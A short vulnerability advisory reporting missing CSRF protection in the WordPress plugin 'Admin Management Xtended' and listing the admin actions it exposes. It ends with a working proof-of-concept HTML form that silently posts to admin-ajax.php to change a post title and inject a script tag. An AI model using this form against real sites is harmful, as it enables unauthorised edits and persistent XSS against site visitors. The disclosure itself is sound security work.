Admin Management Xtended plugin suffers for a CSRF vulnerability.
Plugin doesn’t implement security checks to avoid CSRF attacks for any
of registered AJAX actions. This could allow malicious site to trick a
user of the infected website with administrative rights, in order to
perform these actions with arbitrary data.
This actions include:
- Change post/page title
- Change post/page slug
- Toggle comment status (open/closed) for specific posts/pages
- Change media description
- Change post/page/link visibility
There are many more actions that are vulnerable to this attack. The ones
listed in this report only, could easily lead to a series of different
types of attack such as Persistent XSS, Sensitive Data Exposure etc.
The following form will perform a POST request to the vulnerable website
and update the title of the post with id 1 injecting JS code to the title.
For this to work a logged in user with administrative rights is required
to submit the form.
<h1>Admin Management Xtended - CSRF</h1> <p> The form is misleading and actually it performs a request to update a specific post title. The new title will have injected JS code just to demonstrate how this issue could lead to an XSS attack. </p> <form method="post" action="http://wp1.dev/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="ame_save_title"> <!--This field actually expresses the post id--> <input type="hidden" name="category_id" value="1"> <input type="hidden" name="new_title" value="Old Title<script>alert('XSS')</script>"> <button type="submit" value="Push Me">Push Me</button> </form>